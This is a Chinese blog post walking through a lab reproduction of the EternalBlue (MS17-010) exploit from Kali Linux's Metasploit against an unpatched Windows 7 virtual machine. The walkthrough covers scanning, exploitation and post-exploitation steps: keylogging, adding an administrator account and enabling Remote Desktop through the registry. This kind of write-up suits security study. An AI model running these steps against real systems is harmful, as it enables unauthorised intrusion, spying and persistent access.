
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <title>永恒之蓝漏洞复现 | k-onlの狗窝</title>
    <meta name="author" content="k-onl" />
    <meta name="description" content="" />
    <meta name="keywords" content="" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
    <link rel="icon" href="/images/fufu1.jpg" />
    <link rel="preconnect" href="https://cdn.staticfile.org" />
<script src="https://cdn.staticfile.org/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.loli.net" />
<link rel="preconnect" href="https://gstatic.loli.net" crossorigin />
<link rel="stylesheet" href="https://fonts.loli.net/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap" />
<script> const mixins = {}; </script>

<script src="https://polyfill.io/v3/polyfill.min.js?features=default"></script>




<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 7.0.0"></head>
<body>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/lolisister1.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>K-ONLの狗窝</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;搜索</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;K-ONLの狗窝</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">搜索</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>永恒之蓝漏洞复现</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2023/11/15
        </span>
        
        
    </div>
    
    <div class="content" v-pre>
        <p>漏洞复现<br>1，准备kali-linux 和windows7（未装补丁）两个虚拟机</p>
<p>2，确保kali-linux 和 windows7 两个虚拟机都为桥接模式</p>
<p>3，Kali-Linux改为以root用户登录</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115195938777.png" alt="image-20231115195938777"></p>
<p>4，查看Windows7和kali-Linux的IP地址</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115195947547.png" alt="image-20231115195947547"></p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115195953728.png" alt="image-20231115195953728"></p>
<p>5，通过ping命令，测试两台虚拟机是否能连通</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115200006956.png" alt="image-20231115200006956"></p>
<p>6，kali-linux输入msfconsole启动msf（若不是root登陆需sudo提升权限） 。#msfconsole会启动metasploit，命令提示行显示msf则启动成功。</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115200013464.png" alt="image-20231115200013464"></p>
<p>7，输入search ms17-010查看漏洞模块</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115200020898.png" alt="image-20231115200020898"></p>
<p><strong>3 auxiliary&#x2F;scanner&#x2F;smb&#x2F;smb_ms17_010</strong></p>
<p>是永恒之蓝扫描模块，探测主机是否存在ms17-010漏洞。</p>
<p><strong>0 exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_eternalblue</strong></p>
<p>是永恒之蓝攻击代码，一般两者配合使用，前者先扫描，若是显示有漏洞，再进行攻击。</p>
<p>8，扫描过程</p>
<p>可以使用use auxiliary&#x2F;scanner&#x2F;smb&#x2F;smb_ms17_010或者use 3命令</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115200105018.png" alt="image-20231115200105018"></p>
<p>9，攻击过程</p>
<p>可以使用use exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_eternalblue或者use 0命令</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115200112462.png" alt="image-20231115200112462"></p>
<p>10，显示远程主机系统信息： sysinfo</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115200124552.png" alt="image-20231115200124552"></p>
<p>11，通过 meterpreter 获取屏幕快照： screenshot</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115200144978.png" alt="image-20231115200144978"></p>
<p>12，上传文件到Windows主机，并从Windows主机中下载文件</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115200206916.png" alt="image-20231115200206916"></p>
<p>上传文件：upload kali的文件地址 Windows的保存路径</p>
<p>下载文件 ：download kali的保存路径 windows的文件地址</p>
<p>13，添加用户并到管理员组<br>net user uname pass &#x2F;add 添加用户名为name，密码为pass<br>net localgroup Administrators uname &#x2F;add 将用户名为uname的用户添加到管理员组<br>net user uname &#x2F;del 删除uname用户</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115200220215.png" alt="image-20231115200220215"></p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115200238795.png" alt="image-20231115200238795"></p>
<p>14，键盘监听</p>
<p>ps 看（explorer.exe）进程号</p>
<p>migrate 1892（进程号） 迁移</p>
<p>keyscan_start 键盘监听</p>
<p>keyscan_dump 看键盘输入了什么</p>
<p>15，远程登陆目标主机</p>
<p>C:\WINDOWS\system32&gt;net user admin &#x2F;active:yes<br>开启远程管理服务<br>C:\Windows\system32&gt;reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” &#x2F;v fDenyTSConnections &#x2F;t REG_DWORD &#x2F;d 0 &#x2F;f</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231115200249173.png" alt="image-20231115200249173"></p>

    </div>
    
    
    
    
    
    
    
</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2024 k-onlの狗窝
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;k-onl
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
    




    
</body>
</html>
